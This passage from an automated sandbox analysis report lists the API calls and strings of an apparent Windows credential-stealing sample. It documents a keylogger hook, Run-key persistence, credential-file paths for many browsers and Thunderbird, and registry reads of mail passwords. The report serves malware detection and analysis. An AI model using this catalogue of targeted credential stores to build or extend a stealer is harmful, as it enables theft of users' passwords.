                                                • Opcode ID: 493710888fd6b06008087cf37a446b5d0cd482525da294b3161cbeeb0c1e5a8f
                                                • Instruction ID: 647549b5581b6afbdfecbf6355b0432e600c928c37604508df28fb6808740c6e
                                                • Opcode Fuzzy Hash: 493710888fd6b06008087cf37a446b5d0cd482525da294b3161cbeeb0c1e5a8f
                                                • Instruction Fuzzy Hash: DB016D7160114DBFAB108F92DC80DFB3F6EEF48398710403AFA0582220E7758DE19AA9

Control-flow Graph (graph image not reproduced; basic blocks listed below, executed/not-executed colouring and edge list omitted)
• Basic blocks: 411d0c-411d34 Sleep, GetTickCount
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountSleepTick
                                                • String ID:
                                                • API String ID: 2804873075-0
                                                • Opcode ID: b4ca311bf0cb1c45a44abb39bfeb90d6ab341e64d914aacf874c56c19a1ff2f5
                                                • Instruction ID: bc16fd327cf67d43f179a3bc3a933e895663b38586298b374b7f5ce74d885f03
                                                • Opcode Fuzzy Hash: b4ca311bf0cb1c45a44abb39bfeb90d6ab341e64d914aacf874c56c19a1ff2f5
                                                • Instruction Fuzzy Hash: 24D022303481046FE30C9B09FC4E2A13E4EE7E0345F04C03BF50EC90E0CDB056A04448

Control-flow Graph (graph image not reproduced; basic blocks listed below, executed/not-executed colouring and edge list omitted)
• Basic blocks: 410283-410297 ReleaseMutex, CloseHandle
                                                APIs
                                                • ReleaseMutex.KERNEL32(?,?,0040FEFD,x5A,00405BEC,x5A,00000000,00000000,00000000,00000000,?,?,?,?,00000000,h\HA), ref: 00410288
                                                • CloseHandle.KERNEL32(?), ref: 00410290
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleMutexRelease
                                                • String ID:
                                                • API String ID: 4207627910-0
                                                • Opcode ID: e8ea245e333d34bfb270a1424a8c5bfa333d1f7079b1e1b36508f6edab6d53e3
                                                • Instruction ID: db4c74b9d13bc5dced64540ca7ba47584a69d0e5ed2af3a6983ff5975521201b
                                                • Opcode Fuzzy Hash: e8ea245e333d34bfb270a1424a8c5bfa333d1f7079b1e1b36508f6edab6d53e3
                                                • Instruction Fuzzy Hash: DAB0927A001020EFEB252F94FC0C8D4BFA5FF8839131584BAF18182038CBB20CA09B84

Control-flow Graph (graph image not reproduced; basic blocks listed below, executed/not-executed colouring and edge list omitted)
• Basic blocks: 405eff-405f0f GetProcessHeap, RtlAllocateHeap
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,?,00402FA7,BZ@,?,?,004103FD,BZ@,00405D61,?,770113FB,00000000,?,00405A42,00000000), ref: 00405F02
                                                • RtlAllocateHeap.NTDLL(00000000,?,004103FD,BZ@,00405D61,?,770113FB,00000000,?,00405A42,00000000), ref: 00405F09
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateProcess
                                                • String ID:
                                                • API String ID: 1357844191-0
APIs
  • Part of subcall function 0040308C: lstrlenA.KERNEL32(00000000,004030B4,770113FB,00000000,00000000,?,004032DC,0040350E,00000000,-00000001,770113FB,?,0040350E,00000000,?,00000000), ref: 00403093
• MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,770113FB,00000000,00000000,?,004032DC,0040350E,00000000,-00000001,770113FB), ref: 004030CA
  • Part of subcall function 00405E22: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004033E2,?,00405A4F,h\HA,00000000), ref: 00405E30
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,004032DC,0040350E,00000000,-00000001,770113FB,?,0040350E,00000000), ref: 004030F5
  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
• API ID: lstrlen$ByteCharMultiVirtualWidelstrcpy$AllocFree
• String ID:
• API String ID: 4006399363-0
APIs
• GetProcessHeap.KERNEL32(00000000,?,00403044,?,00405C22,00000000,?,004110EE,?,?,004136B9), ref: 00405EF1
• HeapFree.KERNEL32(00000000), ref: 00405EF8
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
APIs
  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
• GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,00413589,?,00411618,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0040F4A2
  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
  • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00411E18,00000000,00000000,00000000,00000000,h\HA,00000000), ref: 0040109F
  • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
• API ID: Heap$FreeProcesslstrcpylstrlen$AllocateFileModuleNameVirtual
• String ID:
• API String ID: 258861418-0
APIs
• SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040F79C
  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
• API ID: lstrlen$FolderPathSpeciallstrcpy
• String ID:
• API String ID: 1680175942-0
APIs
• RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000), ref: 00410F8E
• API ID: Create
• String ID:
• API String ID: 2289755597-0
APIs
• ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403207
  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
• API ID: lstrlen$EnvironmentExpandStringslstrcpy
• String ID:
• API String ID: 1709970682-0
APIs
• API ID: Value
• String ID:
• API String ID: 3702945584-0
APIs
  • Part of subcall function 00403261: lstrlenW.KERNEL32(770113FB,00403646,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403268
• lstrcatW.KERNEL32(00000000,770113FB,?,?,00413589,?,00411515,00413589,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403365
• API ID: lstrcatlstrlen
• String ID:
• API String ID: 1475610065-0
APIs
  • Part of subcall function 00410298: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0040FEDE,?,?,00410459,?,770113FB,00000000,00405A34), ref: 004102A0
• WSAStartup.WS2_32(00000002,?), ref: 004058FC
• API ID: CreateMutexStartup
• String ID:
• API String ID: 3730780901-0
APIs
  • Part of subcall function 00403125: lstrcatA.KERNEL32(00000000,770113FB,?,00000000,?,004035C4,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 00403151
• CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 0040FDC0
• API ID: CreateEventlstrcat
• String ID:
• API String ID: 2275612694-0
APIs
• CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0040FEDE,?,?,00410459,?,770113FB,00000000,00405A34), ref: 004102A0
• API ID: CreateMutex
• String ID:
• API String ID: 1964310414-0
APIs
• API ID: Close
• String ID:
• API String ID: 3535843008-0
APIs
• SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0040F725
• API ID: CreateDirectory
• String ID:
• API String ID: 4241100979-0
APIs
• API ID: Uninitialize
• String ID:
• API String ID: 3861434553-0
APIs
• VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004033E2,?,00405A4F,h\HA,00000000), ref: 00405E30
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
APIs
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403652,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00405EBE
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
                                                APIs
                                                • GetAsyncKeyState.USER32 ref: 00408A11
                                                • CallNextHookEx.USER32(00000000,?,?,?), ref: 00408E12
                                                  • Part of subcall function 00408E66: GetForegroundWindow.USER32 ref: 00408E8F
                                                  • Part of subcall function 00408E66: GetWindowTextW.USER32(00000000,?,00000104,?,?), ref: 00408EA2
                                                  • Part of subcall function 00408E66: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408F0B
                                                  • Part of subcall function 00408E66: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00408F79
                                                  • Part of subcall function 00408E66: lstrlenW.KERNEL32(00414AD0,00000008,00000000,?,?), ref: 00408FA2
                                                  • Part of subcall function 00408E66: WriteFile.KERNEL32(?,00414AD0,00000000,?,?), ref: 00408FAE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                                • String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
                                                Strings
                                                • \BraveSoftware\Brave-Browser\User Data\Default\Login Data, xrefs: 0040C315
                                                • \CentBrowser\User Data\Default\Login Data, xrefs: 0040C39C
                                                • \Tencent\QQBrowser\User Data\Default\Login Data, xrefs: 0040C2A8
                                                • \Torch\User Data\Default\Login Data, xrefs: 0040C366
                                                • \Blisk\User Data\Local State, xrefs: 0040C2DA
                                                • \Microsoft\Edge\User Data\Local State, xrefs: 0040C26C
                                                • \Microsoft\Edge\User Data\Default\Login Data, xrefs: 0040C271
                                                • \Chromium\User Data\Default\Login Data, xrefs: 0040C2FA
                                                • \Opera Software\Opera Stable\Login Data, xrefs: 0040C2C4
                                                • \Comodo\Dragon\User Data\Default\Login Data, xrefs: 0040C34B
                                                • ,%@, xrefs: 0040C415
                                                • \Google\Chrome\User Data\Local State, xrefs: 0040C236
                                                • \Vivaldi\User Data\Local State, xrefs: 0040C329
                                                • \Blisk\User Data\Default\Login Data, xrefs: 0040C2DF
                                                • \Chromium\User Data\Local State, xrefs: 0040C2F5
                                                • \Slimjet\User Data\Default\Login Data, xrefs: 0040C381
                                                • \Opera Software\Opera Stable\Local State, xrefs: 0040C2BF
                                                • \Torch\User Data\Local State, xrefs: 0040C361
                                                • \CentBrowser\User Data\Local State, xrefs: 0040C397
                                                • \BraveSoftware\Brave-Browser\User Data\Local State, xrefs: 0040C310
                                                • \Epic Privacy Browser\User Data\Local State, xrefs: 0040C251
                                                • \Comodo\Dragon\User Data\Local State, xrefs: 0040C346
                                                • \UCBrowser\User Data_i18n\Default\UC Login Data.17, xrefs: 0040C28D
                                                • \Slimjet\User Data\Local State, xrefs: 0040C37C
                                                • \Tencent\QQBrowser\User Data\Local State, xrefs: 0040C2A3
                                                • \Vivaldi\User Data\Default\Login Data, xrefs: 0040C330
                                                • \Epic Privacy Browser\User Data\Default\Login Data, xrefs: 0040C256
                                                • \Google\Chrome\User Data\Default\Login Data, xrefs: 0040C23B
                                                • \UCBrowser\User Data_i18n\Local State, xrefs: 0040C288
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FilePath$lstrcatlstrcpy$BinaryCopyExistsOpenType$CloseCombineEnumFolderInfoPrivateProfileQuerySpecialString
                                                • String ID: ,%@$\Blisk\User Data\Default\Login Data$\Blisk\User Data\Local State$\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\BraveSoftware\Brave-Browser\User Data\Local State$\CentBrowser\User Data\Default\Login Data$\CentBrowser\User Data\Local State$\Chromium\User Data\Default\Login Data$\Chromium\User Data\Local State$\Comodo\Dragon\User Data\Default\Login Data$\Comodo\Dragon\User Data\Local State$\Epic Privacy Browser\User Data\Default\Login Data$\Epic Privacy Browser\User Data\Local State$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Opera Software\Opera Stable\Local State$\Opera Software\Opera Stable\Login Data$\Slimjet\User Data\Default\Login Data$\Slimjet\User Data\Local State$\Tencent\QQBrowser\User Data\Default\Login Data$\Tencent\QQBrowser\User Data\Local State$\Torch\User Data\Default\Login Data$\Torch\User Data\Local State$\UCBrowser\User Data_i18n\Default\UC Login Data.17$\UCBrowser\User Data_i18n\Local State$\Vivaldi\User Data\Default\Login Data$\Vivaldi\User Data\Local State
                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000), ref: 0040A31C
                                                • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000), ref: 0040A363
                                                • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 0040A3A7
                                                • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 0040A3EB
                                                • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 0040A42F
                                                • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 0040A473
                                                • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 0040A4E0
                                                • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 0040A54D
                                                • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 0040A5BA
                                                  • Part of subcall function 0040A632: GlobalAlloc.KERNEL32(00000040,-00000001,770145FD,?,?,?,0040A5E6,00001000,?,00000000,00001000), ref: 0040A650
                                                  • Part of subcall function 0040A632: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040A5E6), ref: 0040A686
                                                  • Part of subcall function 0040A632: lstrcpyW.KERNEL32(?,Could not decrypt), ref: 0040A6BD
                                                  • Part of subcall function 00403261: lstrlenW.KERNEL32(770113FB,00403646,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403268
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                                • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                                APIs
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                • LoadResource.KERNEL32(00000000,?,00000000), ref: 004130EE
                                                • SizeofResource.KERNEL32(00000000,?), ref: 004130FA
                                                • LockResource.KERNEL32(00000000), ref: 00413104
                                                • GetTempPathA.KERNEL32(00000400,?), ref: 0041313E
                                                • lstrcatA.KERNEL32(?,find.exe), ref: 00413152
                                                • GetTempPathA.KERNEL32(00000400,?), ref: 00413160
                                                • lstrcatA.KERNEL32(?,find.db), ref: 0041316E
                                                • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 00413189
                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0041319B
                                                • CloseHandle.KERNEL32(00000000), ref: 004131A2
                                                • wsprintfA.USER32 ref: 004131D2
                                                • ShellExecuteExA.SHELL32(0000003C), ref: 00413220
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                                • String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
                                                APIs
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 0040C118: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040C154
                                                  • Part of subcall function 0040C118: lstrcatW.KERNEL32(?,thunderbird.exe,?,00000104,00000000), ref: 0040C162
                                                  • Part of subcall function 0040C118: RegOpenKeyExW.ADVAPI32 ref: 0040C17B
                                                  • Part of subcall function 0040C118: RegQueryValueExW.ADVAPI32(0040A729,Path,00000000,?,?,?), ref: 0040C198
                                                  • Part of subcall function 0040C118: RegCloseKey.ADVAPI32(0040A729), ref: 0040C1A1
                                                • lstrcatW.KERNEL32(?,\firefox.exe,?), ref: 0040AC8C
                                                • GetBinaryTypeW.KERNEL32 ref: 0040AC9D
                                                • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040B11D
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00403272: wsprintfW.USER32 ref: 0040328D
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 00403554: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404E98,?), ref: 00403581
                                                  • Part of subcall function 00403554: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 004035AC
                                                • CopyFileW.KERNEL32 ref: 0040AE14
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyFileFreeOpenPrivateProfileQueryStringTypeValueVirtualwsprintf
                                                • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                                APIs
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00408840
                                                • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00408894
                                                • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 004088AE
                                                • GetLocalTime.KERNEL32(?), ref: 004088B5
                                                • wsprintfW.USER32 ref: 004088E9
                                                • lstrcatW.KERNEL32(-00000010,?), ref: 00408900
                                                • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 0040892C
                                                • CloseHandle.KERNEL32(00000000), ref: 0040893C
                                                  • Part of subcall function 00411E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00411E4E
                                                  • Part of subcall function 00411E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,0041349D), ref: 00411E61
                                                  • Part of subcall function 00411E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00411E72
                                                  • Part of subcall function 00411E21: CloseHandle.KERNEL32(00000000), ref: 00411E7F
                                                  • Part of subcall function 004109D2: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,7571826E,00000000,?,?,?,?,0040895D), ref: 004109FE
                                                • GetMessageA.USER32 ref: 004089AF
                                                  • Part of subcall function 00410969: lstrcmpA.KERNEL32(?,00411BD0,?,open,00411BD0), ref: 004109A2
                                                • TranslateMessage.USER32(?), ref: 00408996
                                                • DispatchMessageA.USER32(?), ref: 004089A1
                                                Strings
                                                • c:\windows\system32\user32.dll, xrefs: 0040894A
                                                • SetWindowsHookExA, xrefs: 00408962
                                                • \Microsoft Vision\, xrefs: 004088A8
                                                • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 004088E3
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$HandleMessage$CloseCreatelstrcat$AllocDispatchFolderLocalModulePathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                                • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                                APIs
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 0040C118: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040C154
                                                  • Part of subcall function 0040C118: lstrcatW.KERNEL32(?,thunderbird.exe,?,00000104,00000000), ref: 0040C162
                                                  • Part of subcall function 0040C118: RegOpenKeyExW.ADVAPI32 ref: 0040C17B
                                                  • Part of subcall function 0040C118: RegQueryValueExW.ADVAPI32(0040A729,Path,00000000,?,?,?), ref: 0040C198
                                                  • Part of subcall function 0040C118: RegCloseKey.ADVAPI32(0040A729), ref: 0040C1A1
                                                • GetBinaryTypeW.KERNEL32 ref: 0040A747
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 0040B67E: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040B6AC
                                                  • Part of subcall function 0040B67E: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B6B5
                                                  • Part of subcall function 0040B67E: PathFileExistsW.SHLWAPI(0040A760), ref: 0040B7A3
                                                • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040ABCA
                                                  • Part of subcall function 0040B67E: PathFileExistsW.SHLWAPI(0040A760), ref: 0040B7FF
                                                  • Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?,0040A760,?,00000104,00000000), ref: 0040B83E
                                                  • Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B849
                                                  • Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B854
                                                  • Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B85F
                                                  • Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B86A
                                                  • Part of subcall function 0040B67E: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B957
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
                                                • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D517
                                                • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0040D52C
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D539
                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D546
                                                • GetLastError.KERNEL32 ref: 0040D550
                                                • Sleep.KERNEL32(000007D0), ref: 0040D562
                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D56B
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D57F
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D582
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                                • String ID: ServicesActive
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0040DA82
                                                • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0040DAB9
                                                  • Part of subcall function 00405EFF: GetProcessHeap.KERNEL32(00000008,?,00402FA7,BZ@,?,?,004103FD,BZ@,00405D61,?,770113FB,00000000,?,00405A42,00000000), ref: 00405F02
                                                  • Part of subcall function 00405EFF: RtlAllocateHeap.NTDLL(00000000,?,004103FD,BZ@,00405D61,?,770113FB,00000000,?,00405A42,00000000), ref: 00405F09
                                                • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0040DAE2
                                                • GetLastError.KERNEL32 ref: 0040DAEC
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040DAFA
                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0040DBBB
                                                • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0040DBFE
                                                Strings
                                                Memory Dump Source
